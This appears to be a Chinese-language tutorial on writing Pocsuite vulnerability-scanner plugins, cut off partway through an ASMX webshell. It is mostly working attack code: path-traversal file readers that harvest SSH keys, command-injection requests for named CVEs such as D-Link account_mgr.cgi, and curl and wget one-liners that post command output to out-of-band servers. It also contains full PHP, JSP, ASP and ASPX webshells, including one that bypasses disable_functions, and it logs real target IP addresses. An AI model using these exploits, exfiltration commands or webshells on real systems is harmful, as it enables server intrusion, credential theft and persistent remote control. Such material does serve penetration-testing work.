Skip to content

Pocsuite 插件编写

date
2025-03-15 21:23:28

插件信息

漏洞名称:漏洞编号 产品厂商 产品名称 漏洞特征( 端点... )漏洞类型

例:CVE-2024-51567 CyberPanel upgrademysqlstatus 命令执行漏洞

文件读取

漏洞检测

读取特征然后尝试使用正则去匹配:

def check(self) -> bool:
    try:
        content = self.read_file("/etc/passwd")
        pattern = r'^\w+:[^\n]*:[0-9]+:[0-9]+:[^\n]*:[^\n]*:[^\n]*$'
        if re.search(pattern, content, re.MULTILINE):
            self.system_type = 'linux'
            return True
        content = self.read_file("C:\\Windows\\win.ini")
        if '[fonts]' in content.lower() and '[extensions]' in content.lower() and '[files]' in content.lower():
            self.system_type = 'windows'
            return True
        except Exception as e:
            pass
        return False

read_file 要检测一下是不是蜜罐,所以包含再 HTML 里面的就要提取好完整的结果。而不是直接返回 res.text。

@lru_cache(maxsize=None)
def read_file(self, file_name):
    """
    读取文件 => 需要提取明确的文件内容, 不能直接返回因为可能有蜜罐, 需要去除 '<!DOCTYPE html' 这种的
    :param file_name:
    :return:
    """
    try:
        # if '\\' in file_name:
        #     file_name = file_name.replace('C:', '')
        #     file_name = file_name.replace('\\', '/')
        url = self.url.rstrip('/') + ''
        headers = {}
        data = """"""
        res = requests.post(url, headers=headers, data=data, verify=False)
        if res.status_code != 200 or '<!DOCTYPE html'.lower() in res.text.lower() or "</html>" in res.text.lower() or 'No such file'.lower() in res.text.lower():
            return ''
        file_content = res.text.rstrip('\n')
        logger.info("{} => {} => {}".format(self.url, file_name, file_content))
        return file_content
    except Exception as e:
        pass
    return ''

漏洞利用

如果可以读取 .ssh 下面的密钥,可以实现远程登陆,还是比较有用的。

https://www.runoob.com/w3cnote/set-ssh-login-key.html

1
2
3
4
5
6
7
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
try:
    lines = self.passwd.splitlines()
    for line in lines:
        # 可以远程登陆的还有 zsh 之类的
        if '/bin/bash' not in line and '/bin/sh' not in line:
            continue
        home_directory = line.split(':')[5]
        if home_directory == "/":
            continue
        # 文件读取
        for file_name in ['authorized_keys', 'id_rsa', 'id_rsa.pub', 'known_hosts']:
            path = home_directory + '/.ssh/' + file_name
            content = self.read_file(path)
            if content:
                info.append({"name": path, "path": path, "result": content})
except Exception as e:
    pass

SonicWALL Apache HTTP 任意文件读取漏洞可以读取 sqlite3 格式的配置文件,但是发现原生字符串直接存储到系统中导致无法还原。

所以需要存储为 base64

@lru_cache(maxsize=None)  
def read_file(self, file_name):  
    """  
    读取文件  
    :param file_name:    :return:  
    """    try:  
        url = self.url.rstrip('/') + f'{file_name}%3f.1.1.1.1a-1.css'  
        res = requests.get(url, verify=False, timeout=60,stream=True)  
        if '<!DOCTYPE html'.lower() in res.text.lower() or "<html" in res.text.lower():  
            return ''  
        buffer = BytesIO()  
        for chunk in res.iter_content(8192):  
            if chunk:  
                buffer.write(chunk)  
        result = base64.b64encode(buffer.getvalue()).decode('utf-8')  
        if not file_name.endswith('.db'):  
            result = base64.b64decode(result).decode('utf-8')  
        logger.info("{} => {} => {}".format(self.url, file_name, result))  
        return result  
    except Exception as e:  
        pass  
    return ''

特殊情况

响应内容为:

HTTP/1.1 200 OK
Server: cmon/2.1.0.9571
Connection: close
Content-Length: 1856

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
xxxx.......
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:112:119:MySQL Server,,,:/nonexistent:/bin/false
prometheus:x:1001:1001::/home/prometheus:/bin/false
HTTP/1.1 200 OK
Server: cmon/2.1.0.9571
Connection: close
Content-Length: 63
Cache-Control: no-cache,must-revalidate,max-age=0
Pragma: no-cache
Set-Cookie: cmon-sid=ca1d569a93e941ca882cb79bbb82bfbb; expires=Fri, 02 Aug 2024 17:44:49 +0000, path=/, domain=164.90.154.246
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: content-type
Access-Control-Allow-Methods: POST, GET, OPTIONS, HEAD
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 86400
Content-Type: application/json

{
    "controller_id": "2f864ad8-ac59-4aed-ad52-0b1b6bdd1c53"
}

只能使用 socket 去提取:

def read_file(self, filename):
    try:
        http_request_raw = 'GET /../../../../../../../../..{} HTTP/1.1\r\n'.format(filename)
        http_request_raw += 'Host: {}:{}\r\n'.format(self.host, self.port)
        http_request_raw += 'Accept-Encoding: deflate\r\n\r\n'
        response = []
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.connect((self.host, self.port))
            s.sendall(http_request_raw.encode('utf-8'))
            while True:
                part = s.recv(4096)
                if not part:
                    break
                response.append(part)
            s.close()
        data = b''.join(response).decode('utf-8')
        if not data:
            return ''
        result = data.split('\r\n\r\n')
        if len(result) < 2:
            return ''
        if 'HTTP/1.1 200 OK' not in result[1]:
            return ''
        file_content = result[1].split('HTTP/1.1 200 OK')[0]
        logger.info("{} => {} => {}".format(self.url, filename, file_content))
        return file_content
    except Exception as e:
        pass
    return ''

命令执行

有回显

有回显检测比较简单,输出随机的字符串即可,但是在 exec 中需要谨慎对待,因为很多会返回 xxx command not found,所以还是需要特殊情况特殊对待,写完后跑一遍,找找特殊情况。

1
2
3
4
5
6
7
8
def check(self):
    try:
        flag = random_str(15)
        if flag in self.exec(f"echo {flag}"):
            return True
    except Exception as e:
        pass
    return False

无回显

无回显分为两种情况:

  • 有写入文件权限
    • 写 webshell
    • 写 web 静态文件
    • 远程下载( sh | bat )
  • 无写入文件权限
    • dnslog 检测
    • 延时检测
    • httplog 外带获取回显

写静态文件

把命令执行的结果直接写入 txt 或者其他类型的文件,然后读取结果再删掉文件。

这个比较常用,因为一些可以写小马的环境比如 PHP、JSP 等可能会出现杀软杀掉。

有特殊情况写的文件需要再加一层赋予权限的操作才能读 chmod 777 file_path ( CVE-2024-3400 )

def exec(self, command):
    try:
        # 随机文件名称
        file_name = random_str(6) + '.txt'
        file_path = '' + file_name
        to_file_command = f'{command}>{file_path}'
        if not self.exec_command(to_file_command):
            return ''
        # 请求文件获取结果
        url = self.url.rstrip('/') + '' + file_name
        res = requests.get(url, verify=False, allow_redirects=False)
        if res.status_code != 200 or '<!DOCTYPE html'.lower() in res.text.lower():
            return ''
        logger.info("{} => {} => {}".format(self.url, command, res.text.rstrip('\n')))
        # 删除文件,一个文件一个删除,另外一种思路是随机后缀,然后 rm -rf *.xxx 但是太过危险
        delete_command = f'rm -rf {file_path}'
        self.exec_command(delete_command)
        return res.text.rstrip('\n')
    except Exception as e:
        pass
    return ''

def exec_command(self, command) -> bool:
    try:
        url = self.url.rstrip('/') + ''
        headers = {}
        data = """"""
        res = requests.get(url, headers=headers, data=data, verify=False)
        return True
    except Exception as e:
        pass
    return False

dnslog

def check_by_dnslog(self):
    """
    通过 dnslog 进行验证
    :return:
    """
    try:
        servers = [
            "oast.pro",
            "oast.live",
            "oast.site",
            "oast.fun",
            "oast.online",
            "oast.me"
        ]
        server = servers[random.randint(0, len(servers) - 1)]
        ish = Interactsh(token=random_str(15), server=server)
        oob_url, flag = ish.build_request()
        oob_host = urlparse(oob_url).hostname
        commands = [
            f'nslookup {oob_host}',
            f'curl {oob_url}',
            f'wget {oob_url}',
            f'ping -c 5 {oob_host}',
            f'ping {oob_host}',
        ]
        for command in commands:
            self.exec(command)
            time.sleep(3)
            if ish.verify(flag):
                return True
    except Exception as e:
        pass
    return False

httplog

httplog 是对于哪些写不了文件的,权限比较低但是又想要回显的情况。

通过 self.ish.poll() 获取 http 协议的请求获取命令执行的结果。

1
2
3
4
5
id | curl -X POST -d @- <url>
curl -X POST -d "$(<command>)" <url>
curl -H "Cookie:$(<command>)" <url>
wget --post-data $(<command>) <url> --spider
wget --header="Cookie:$(<command>)" <url> --spider  #  $(cat /etc/passwd | xargs echo–n) 去掉换行字符

ish 响应:

[
    {
        "protocol": "dns",
        "unique-id": "p8l7gj70u3h04k44p06l2ho66367tsfug",
        "full-id": "mhpjekynti.p8l7gj70u3h04k44p06l2ho66367tsfug",
        "q-type": "AAAA",
        "raw-request": ";; opcode: QUERY, status: NOERROR, id: 31705\n;; flags:; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags: do; udp: 1232\n\n;; QUESTION SECTION:\n;mhpjekynti.p8l7gj70u3h04k44p06l2ho66367tsfug.oast.site.\tIN\t AAAA\n",
        "raw-response": ";; opcode: QUERY, status: NOERROR, id: 31705\n;; flags: qr aa; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2\n\n;; QUESTION SECTION:\n;mhpjekynti.p8l7gj70u3h04k44p06l2ho66367tsfug.oast.site.\tIN\t AAAA\n\n;; ANSWER SECTION:\nmhpjekynti.p8l7gj70u3h04k44p06l2ho66367tsfug.oast.site.\t3600\tIN\tA\t178.128.16.97\n\n;; AUTHORITY SECTION:\nmhpjekynti.p8l7gj70u3h04k44p06l2ho66367tsfug.oast.site.\t3600\tIN\tNS\tns1.oast.site.\nmhpjekynti.p8l7gj70u3h04k44p06l2ho66367tsfug.oast.site.\t3600\tIN\tNS\tns2.oast.site.\n\n;; ADDITIONAL SECTION:\nns1.oast.site.\t3600\tIN\tA\t178.128.16.97\nns2.oast.site.\t3600\tIN\tA\t178.128.16.97\n",
        "remote-address": "195.3.101.254",
        "timestamp": "2024-10-16T08:22:55.351498427Z"
    },
    {
        "protocol": "http",
        "unique-id": "p8l7gj70u3h04k44p06l2ho66367tsfug",
        "full-id": "mhpjekynti.p8l7gj70u3h04k44p06l2ho66367tsfug",
        "raw-request": "POST /uname%20-a HTTP/1.1\r\nHost: mhpjekynti.p8l7gj70u3h04k44p06l2ho66367tsfug.oast.site\r\nAccept: */*\r\nContent-Length: 99\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: curl/7.82.0\r\n\r\nLinux salia 4.9.11-chargebyte+g87f8fccf0251 #1 PREEMPT Wed Jun 8 04:39:25 UTC 2022 armv7l GNU/Linux",
        "raw-response": "HTTP/1.1 200 OK\r\nConnection: close\r\nAccess-Control-Allow-Credentials: true\r\nAccess-Control-Allow-Headers: Content-Type, Authorization\r\nAccess-Control-Allow-Origin: *\r\nContent-Type: text/html; charset=utf-8\r\nServer: oast.site\r\nX-Interactsh-Version: 1.2.2\r\n\r\n<html><head></head><body>gufst76366oh2l60p44k40h3u07jg7l8p</body></html>",
        "remote-address": "176.66.69.141",
        "timestamp": "2024-10-16T08:22:55.740501009Z"
    }
]

封装为对应的函数如下:

def get_command_name_from_raw_request(raw_request) -> str:
    """
    从原始请求中提取命令名称:
    :param raw_request:
    :return:
    """
    try:
        # 通过 URL 传输执行的命令名称
        command_encode_name = raw_request.split(' ')[1].lstrip('/')
        command_name = unquote(command_encode_name)
        if command_name:
            # 可以 hex 编码
            # return bytes.fromhex(command_name).decode()
            return command_name
        # 通过 header 传输执行的命令名称
        # header_name = 'cmd'
        # for line in raw_request.split('\r\n'):
        #     if header_name not in line:
        #         continue
        #     command_name = ''.join(line.split(':')[1:]).strip()
        #     return command_name
    except Exception as e:
        pass
    return ''


def get_command_result_from_raw_request(raw_request) -> str:
    """
    从原始请求中提取命令执行结果 ( post data )
    :param raw_request:
    :return:
    """
    try:
        post_data = raw_request.split('\r\n\r\n')[-1]
        return post_data
    except Exception as e:
        pass
    return ''

def get_command_info_from_httplog(ish: interactsh) -> list:
    """
    从 ish 请求记录提取命令执行信息
    :param ish:
    :return:
    """
    info = []
    try:
        for item in ish.poll():
            if item.get('protocol') != 'http':
                continue
            raw_request = item.get('raw-request')
            name = get_command_name_from_raw_request(raw_request)
            result = get_command_result_from_raw_request(raw_request)
            if name and result:
                info.append({
                    'name': name,
                    'result': result,
                })
                logger.info({
                    'name': name,
                    'result': result,
                })
    except Exception as e:
        pass
    return info


def init_ish() -> interactsh:
    try:
        servers = [
            "oast.pro",
            "oast.live",
            "oast.site",
            "oast.fun",
            "oast.online",
            "oast.me"
        ]
        server = servers[random.randint(0, len(servers) - 1)]
        ish = Interactsh(token=random_str(15), server=server)
        return ish
    except Exception as e:
        pass
    return None

延时检测

对于不出网的情况的漏洞检测。

利用:timeout、sleep、ping 等命令造成延时

有 sleep 的可以类似 sql 注入的延时检测:

  • 延时后的时间 > 延时时间(随机 20 ~ 30 s) > 正常请求

没有的使用 ping:

  • ping 15 次时间 > ping 10 次 > ping 5 次

这类 poc 可以增加一个检测日志,执行的命令,响应所用的秒数,用于人工看的时候可以明显判定非误报。

测试漏洞:CVE-2023-46359 Salia PLCC cPH2 命令执行漏洞

测试情况:

  • 共 58 条 url
  • dnslog 检测结果:7 个
  • sleep 检测结果:随机 30 ~ 40s | 结果:7 个
  • ping 检测结果:分别 ping 30、20、10、1 次 | 结果:6 个
  • 没有误报的

sleep 类型:

image-20241115142727639

ping 类型:

image-20241115143014296

测试日志:

{
    "url": "http://80.90.145.225:202",
    "info": {
        "info": "sleep | ping -c 验证漏洞存在 !",
        "check_log": [
            {
                "command": "sleep 0",
                "elapsed": 2.764704
            },
            {
                "command": "sleep 58",
                "elapsed": 61.271262
            },
            {
                "command": "ping -c 30 127.0.0.1",
                "elapsed": 31.945672
            },
            {
                "command": "ping -c 20 127.0.0.1",
                "elapsed": 22.18187
            },
            {
                "command": "ping -c 10 127.0.0.1",
                "elapsed": 12.321375
            },
            {
                "command": "ping -c 1 127.0.0.1",
                "elapsed": 4.103144
            }
        ]
    },
    "scan_time": "2024-11-15 06:37:27Z",
    "mmh3_hash": "454884881"
}

具体代码:

    def check_by_sleep(self) -> dict:
        """
        利用 sleep 进行漏洞验证:
        - Linux: sleep 30
        - Windows: timeout /t 30 /nobreak
        :return:
        """
        try:
            command = 'sleep {}'
            timeout = random.randint(30, 40)
            result = {
                0: self.exec(command.format(0)),
                timeout: self.exec(command.format(timeout))
            }
            if result[timeout] > timeout > result[0]:
                return result
        except Exception as e:
            pass
        return {}

    def check_by_ping(self) -> dict:
        """
        利用 ping 的次数造成的延时进行漏洞验证:
        - Linux: ping -c 30 127.0.0.1
        - Windows: ping -n 30 127.0.0.1
        :return:
        """
        try:
            result = {}
            command = 'ping -c {} 127.0.0.1'
            counts = [30, 20, 10, 1]
            for count in counts:
                result.update({
                    count: self.exec(command.format(count)),
                })
            if result[30] > result[20] and result[30] > result[10]:
                return result
        except Exception as e:
            pass
        return {}

    def check(self):
        try:
            check_logs = []
            # 1. 通过 sleep 进行验证
            result = self.check_by_sleep()
            for key, value in result.items():
                if value is None or int(value) == 0:
                    return []
                command = f'sleep {key}'
                msg = {
                    'command': command,
                    'elapsed': value,
                }
                logger.info(msg)
                check_logs.append(msg)
            # 2. 通过 ping 的次数进行验证
            result = self.check_by_ping()
            for key, value in result.items():
                if value is None or int(value) == 0:
                    return []
                command = f'ping -c {key} 127.0.0.1'
                msg = {
                    'command': command,
                    'elapsed': value,
                }
                logger.info(msg)
                check_logs.append(msg)
            return check_logs
        except Exception as e:
            pass
        return False

    def exec(self, command) -> float:
        """
        执行命令
        尽量要有一个条件判断执行成功了没有, 比如状态码 200 或者它会回显 127.0.0.1 && sleep 0 => <b>SUCCESS</b>
        :param command:
        :return: 响应所用时间
        """
        try:
            logger.info('exec command {}'.format(command))
            url = self.url.rstrip('/') + '/connectioncheck.php'
            params = {
                'ip': f'127.0.0.1 && {command}'
            }
            res = requests.get(url, params=params, verify=False, timeout=360)
            if res.status_code != 200 or 'SUCCESS' not in res.text:
                return 0
            return res.elapsed.total_seconds()
        except Exception as e:
            pass

    def _verify(self):
        backdoor = self.get_option("backdoor")
        cmd = self.get_option("cmd")
        only_check = self.get_option("check")
        save_result = self.get_option("save")
        result = {}
        self.raw_url = self.url
        self.host = urlparse(self.url).hostname
        self.port = urlparse(self.url).port
        if self.port is None:
            self.port = 443
        if cmd:
            if not hasattr(self, "_cmd"):
                raise NotImplementedError
            result = self._cmd()
        else:
            try:
                check_logs = self.check()
                if not check_logs:
                    return self.parse_output(result)
                result["url"] = self.url
                if only_check:
                    result["result"] = f"存在 {self.name}"
                else:
                    result["info"] = {
                        'info': 'sleep | ping -c 验证漏洞存在 !',
                        'check_log': check_logs
                    }
                if backdoor:
                    if not hasattr(self, "_backdoor"):
                        raise NotImplementedError
                    backdoor_result = self._backdoor()
                    if backdoor_result:
                        result["backdoor"] = backdoor_result
                result["scan_time"] = datetime.datetime.utcnow().strftime("%Y-%m-%d %H:%M:%SZ")
                result["mmh3_hash"] = self.generate_mmh3_hash()
            except Exception as e:
                pass
        if result and save_result:
            self.save(result)
        return self.parse_output(result)

特殊情况

回显到响应头

image-20240726131720186

解决方法:

  1. 构造合法 header
  2. 写到文件后读取

合法 header:

image-20240726131757787

Python 就可以解析:

image-20240726131930082

image-20240726131915685

写入文件:

image-20240726132113923

回显位置响应体或者响应头

CVE-2024-10914 D-Link NAS account_mgr.cgi name 参数命令注入漏洞

image-20241112150726591

image-20241112150809749

所以只能使用 sockt 完成 http 请求,然后利用 echo "$(cat+/etc/passwd)" + 正则去提取准确的结果。

image-20241112150950505

def exec_command(self, command) -> str:
    """
    命令注入实现:
    PS: 该漏洞的结果可能响应在 Header 中, 所以该方法只实现命令注入, 由 exec 方法提取准确的回显
    :param command:
    :return:
    """
    try:
        http_request_raw = "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=';{};' HTTP/1.1\r\n".format(command)
        http_request_raw += 'Host: {}:{}\r\n'.format(self.host, self.port)
        http_request_raw += 'User-Agent: Mozilla/5.0 (Android 5.0; Mobile; rv:56.0) Gecko/56.0 Firefox/56.0\r\n'
        http_request_raw += 'Accept-Encoding: gzip, deflate, br\r\n'
        http_request_raw += 'Accept: */*\r\n'
        http_request_raw += 'Connection: close\r\n\r\n'
        response = b''
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.connect((self.host, self.port))
            s.sendall(http_request_raw.encode('utf-8'))
            while True:
                part = s.recv(4096)
                if not part:
                    break
                response += part
            s.close()
        return response.decode('utf-8')
    except Exception as e:
        pass
    return ''

@lru_cache(maxsize=None)
def exec(self, command) -> str:
    """
    构造回显提取
    :param command:
    :return:
    """
    try:
        command = f'echo "<result>$({command})</result>"'
        command = command.replace(' ', '+')
        http_response_raw = self.exec_command(command)
        match = re.findall(pattern=r'<result>(.*)</result>', string=http_response_raw, flags=re.DOTALL)
        if match:
            result = match[0]
            # 防止原模原样的返回了 导致误报
            if result and not result.startswith('$('):
                logger.info({'url': self.url, 'command': command, 'result': result})
                return result
    except Exception as e:
        pass
    return ''

中文编码问题

image-20240826124708633

首先尝试解码如 gbk 测试网站:http://www.mytju.com/classcode/tools/messycoderecover.asp

这个不行,换一种思路,通过 powershell 输出 base64 的形态,然后再解码获取正确的中文( 之前遇到一个数据库 postgresql 命令执行会因为编码问题报错,也是这样解决的 )

powershell -Command [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes((cmd /c {command})))

image-20240826125016590

那么对于正常的可以使用 GBK 解码的就可以这样:

def exec(self, command):
    try:
        params = {
            'command':command
        }
        res = requests.post(self.shell_url, params=params, verify=False)
        if res.status_code != 200 or '<!DOCTYPE html'.lower() in res.text.lower() or "</html>" in res.text.lower():
            return ''
        try:
            # 尝试使用 GBK 解码
            decoded_text = res.content.decode('gbk')
            result = decoded_text
        except (UnicodeDecodeError, AttributeError):
            result = res.text
        result = result.rstrip('\n')
        logger.info("{} => {} => {}".format(self.url, command, result))
        return result
    except Exception as e:
        pass
    return ''

系统类型

命令执行需要先判断系统类型( windows | linux ),之前使用的是 whoami 的形式,windows whoami 有一个斜杠,而 linux 没有:

desktop-50utgo8\fuyoumingyan

但是有些漏洞就会出现问题,比如出现没有 whoami 或者 linux 的 whoami 结果是一个报错的但是报错中包含有斜杆的就会导致失误。

更换为了多个命令判断:

windows:

  • echo %OS% => Windows_NT( linux 就会正常的 %OS% )
  • ver => Microsoft Windows [版本 10.0.22631.4037]

linux:

  • uname => Linux

而且获取多次可能会导致一次获取到一次不行。

修改为判断漏洞是否存在后就判断能否获取到操作系统:

image-20240828150253652

image-20240828150315464

文件上传

漏洞检测

最简单准确的做法,通过输出 MD5 或者随机字符串:

def check(self) -> bool:
    try:
        file_content = "<?php echo md5('123');unlink(__FILE__);?>"
        file_url = self.download_shell(file_content)
        res = requests.get(file_url, verify=False, allow_redirects=False)
        if res.status_code == 200 and '202cb962ac59075b964b07152d234b70' in res.text:
            return True
    except Exception as e:
        pass
    return False

PHP:

<?php echo md5('123');unlink(__FILE__);?>

JSP:

<% out.println("202cb962ac59075b964b07152d234b70");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>

漏洞利用

通过 pocsuite3 上传小马进行命令执行

  1. 上传小马
  2. 访问检测是否上传成功
  3. 命令执行
  4. 删除自身( 在上传的小马中写好自删除的逻辑 )
def upload(self, file_content) -> str:
    """
    :param file_content:
    :return: 上传后的文件 URL
    """
    try:
        file_name = random_str(6) + '.php'
        url = self.url.rstrip('/') + ''
        headers = {

        }
        data = {

        }
        files = {
            'file': (
                file_name,
                file_content,
                'text/plain'
            )
        }
        res = requests.post(url, headers=headers, data=data, files=files, verify=False, allow_redirects=False)
        if res.status_code == 200:  
            file_url = self.url.rstrip('/') + ''
            msg = 'upload success => {}'.format(file_url)
            logger.info(msg)
            return file_url
    except Exception as e:
        pass
    return ''

def delete(self):
    try:
        if self.shell_url:
            self.exec('delete')
            logger.info('delete shell => {}'.format(self.shell_url))
            self.shell_url = ''
    except Exception as e:
        pass

def check(self):
    try:
        shell_content_base64 = ''
        shell_content = base64.b64decode(shell_content_base64.encode('utf-8')).decode('utf-8')
        self.shell_url = self.upload(shell_content)
        if not self.shell_url:
            return False
        flag = random_str(20)
        if flag in self.exec(f"echo {flag}"):
            return True
    except Exception as e:
        pass
    return False

常用小马

PHP

普通小马

1
2
3
4
5
6
7
<?php
if (!empty($_REQUEST['command'])) {
    if ($_REQUEST['command'] === 'delete'){
        unlink(__FILE__);
    }
    system($_REQUEST["command"]);
}?>

命令执行函数存在限制的简单绕过小马( 哥斯拉的 )

<?php

function function_existsEx($functionName)
{
    $d = explode(",", @ini_get("disable_functions"));
    if (empty($d)) {
        $d = array();
    } else {
        $d = array_map('trim', array_map('strtolower', $d));
    }
    return (function_exists($functionName) && is_callable($functionName) && !in_array($functionName, $d));
}

function execCommand($cmdLine)
{
    @ob_start();
    if (substr(__FILE__, 0, 1) == "/") {
        @putenv("PATH=" . getenv("PATH") . ":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin");
    } else {
        @putenv("PATH=" . getenv("PATH") . ";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;");
    }
    $result = "";
    if (!function_existsEx("runshellshock")) {
        function runshellshock($d, $c)
        {
            if (substr($d, 0, 1) == "/" && function_existsEx('putenv') && (function_existsEx('error_log') || function_existsEx('mail'))) {
                if (strstr(readlink("/bin/sh"), "bash") != FALSE) {
                    $tmp = tempnam(sys_get_temp_dir(), 'as');
                    putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");
                    if (function_existsEx('error_log')) {
                        error_log("a", 1);
                    } else {
                        mail("a@127.0.0.1", "", "", "-bv");
                    }
                } else {
                    return False;
                }
                $output = @file_get_contents($tmp);
                @unlink($tmp);
                if ($output != "") {
                    return $output;
                }
            }
            return False;
        }

        ;
    }
    if (function_existsEx('system')) {
        @system($cmdLine);
    } elseif (function_existsEx('passthru')) {
        $result = @passthru($cmdLine);
    } elseif (function_existsEx('shell_exec')) {
        $result = @shell_exec($cmdLine);
    } elseif (function_existsEx('exec')) {
        @exec($cmdLine, $o);
        $result = join("\n", $o);
    } elseif (function_existsEx('popen')) {
        $fp = @popen($cmdLine, 'r');
        while (!@feof($fp)) {
            $result .= @fgets($fp, 1024 * 1024);
        }
        @pclose($fp);
    } elseif (function_existsEx('proc_open')) {
        $p = @proc_open($cmdLine, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
        while (!@feof($io[1])) {
            $result .= @fgets($io[1], 1024 * 1024);
        }
        while (!@feof($io[2])) {
            $result .= @fgets($io[2], 1024 * 1024);
        }
        @fclose($io[1]);
        @fclose($io[2]);
        @proc_close($p);
    } elseif (substr(__FILE__, 0, 1) != "/" && @class_exists("COM")) {
        $w = new COM('WScript.shell');
        $e = $w->exec($cmdLine);
        $so = $e->StdOut();
        $result .= $so->ReadAll();
        $se = $e->StdErr();
        $result .= $se->ReadAll();
    } elseif (function_existsEx("pcntl_fork") && function_existsEx("pcntl_exec")) {
        $cmd = "/bin/bash";
        if (!file_exists($cmd)) {
            $cmd = "/bin/sh";
        }
        $commandFile = sys_get_temp_dir() . "/" . time() . ".log";
        $resultFile = sys_get_temp_dir() . "/" . (time() + 1) . ".log";
        @file_put_contents($commandFile, $cmdLine);
        switch (pcntl_fork()) {
            case 0:
                $args = array("-c", "$cmdLine > $resultFile");
                pcntl_exec($cmd, $args);
                exit(0);
            default:
                break;
        }
        if (!file_exists($resultFile)) {
            sleep(2);
        }
        $result = file_get_contents($resultFile);
        @unlink($commandFile);
        @unlink($resultFile);
    } elseif (($result = runshellshock(__FILE__, $cmdLine) !== false)) {

    } else {
        return "none of proc_open/passthru/shell_exec/exec/exec/popen/COM/runshellshock/pcntl_exec is available";
    }
    $result .= @ob_get_contents();
    @ob_end_clean();
    return $result;
}

if (!empty($_REQUEST['command'])) {
    if ($_REQUEST['command'] === 'delete') {
        unlink(__FILE__);
    }
    echo execCommand($_REQUEST["command"]);
} else {
    header("Location: /");
    exit;
}
?>

重新写一个命令执行的小马,对于一些限制上传种有 system 这种函数的简单绕过

<?php file_put_contents("shell_name", base64_decode("shell_base64_content"));unlink(__FILE__);?>

JSP

<%@ page import="java.io.*" %>
<%
    String command = request.getParameter("command");
    if (command != null) {
        if (command.equals("delete")) {
            (new File(application.getRealPath(request.getServletPath()))).delete();
        } else {
            boolean isLinux = true;
            String osTyp = System.getProperty("os.name");
            if (osTyp != null && osTyp.toLowerCase().contains("win")) {
                isLinux = false;
            }
            String[] cmds = isLinux ? new String[]{"sh", "-c", command} : new String[]{"cmd.exe", "/c", command};

            try {
                Process process = Runtime.getRuntime().exec(cmds);
                BufferedReader reader = new BufferedReader(new InputStreamReader(process.getInputStream()));
                String line;
                while ((line = reader.readLine()) != null) {
                    out.println(line);
                }
                reader.close();
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
    }
%>

ASP

<%
Function ExecuteCommand(command)
    Dim objShell, objExec, strOutput
    Set objShell = Server.CreateObject("WScript.Shell")
    Set objExec = objShell.Exec("cmd.exe /c " & command)
    strOutput = objExec.StdOut.ReadAll()
    Set objExec = Nothing
    Set objShell = Nothing
    If Len(strOutput) > 0 Then
        ExecuteCommand = strOutput
    Else
        ExecuteCommand = ""
    End If
End Function


Dim command
command = Request.QueryString("command")
Dim output
output = ExecuteCommand(command)


If Len(output) > 0 And Len(command) > 0 Then
    Response.Write(output)
End If
%>


On Error Resume Next  ' 开启错误处理

Dim fs, file
Dim currentScriptName
Dim filePath
currentScriptName = Request.ServerVariables("Script_Name")
filePath = Server.MapPath(currentScriptName)

Response.Write("File path: " & filePath & "<br>")

Set fs = Server.CreateObject("Scripting.FileSystemObject")
fs.DeleteFile(filePath)

If Err.Number <> 0 Then
    Response.Write("Error: " & Err.Description)
    Err.Clear
End If

Set fs = Nothing  ' 清理对象

ASPX

<%@ Page Language="C#" %>
<!DOCTYPE html>
<html>
<body>
    <form id="form1" runat="server">
        <div>
            <asp:Label ID="lblOutput" runat="server" Text=""></asp:Label>
        </div>
    </form>
</body>
</html>

<script runat="server">
protected void Page_Load(object sender, EventArgs e)
{
    if (!IsPostBack)
    {
        string command = Request.QueryString["command"];
        if (string.Equals(command, "delete", StringComparison.OrdinalIgnoreCase))
        {
            System.IO.File.Delete(Request.PhysicalPath);
        }
        if (!string.IsNullOrEmpty(command))
        {
            ExecuteCommandAndDisplayOutput(command);
        }
    }
}

private void ExecuteCommandAndDisplayOutput(string command)
{
    try
    {
        System.Diagnostics.Process process = new System.Diagnostics.Process();
        process.StartInfo.FileName = "cmd.exe";
        process.StartInfo.Arguments = "/C " + command;
        process.StartInfo.RedirectStandardOutput = true;
        process.StartInfo.UseShellExecute = false;
        process.StartInfo.CreateNoWindow = true;
        process.Start();
        string output = process.StandardOutput.ReadToEnd();
        process.WaitForExit();
        lblOutput.Text = "<pre>" + Server.HtmlEncode(output) + "</pre>";
    }
    catch (Exception ex)
    {
        lblOutput.Text = "<pre>Error: " + Server.HtmlEncode(ex.Message) + "</pre>";
    }
}
</script>

提取结果的脚本

def exec(self, command):
    try:
        params = {
            'command': command,
        }
        res = requests.get(self.shell_url, params=params, verify=False)
        if res.status_code != 200:
            return ''
        soup = BeautifulSoup(res.content, 'html.parser')
        pre = soup.find('pre')
        if pre:
            result = pre.get_text().rstrip('\n')
            logger.info("{} => {} => {}".format(self.url, command, result))
            return result
    except Exception as e:
        pass
    return ''

ASMS

<%@ WebService Language="C#" Class="WebService1" %>

using System;
using System.IO;
using System.Diagnostics;
using System.Web;
using System.Web.Services;

[WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)]
public class WebService1 : System.Web.Services.WebService
{
    public WebService1()
    {
        //
        // TODO: Add any constructor code required
        //
    }

    [WebMethod]
    public string Cmdshell(string command)
    {
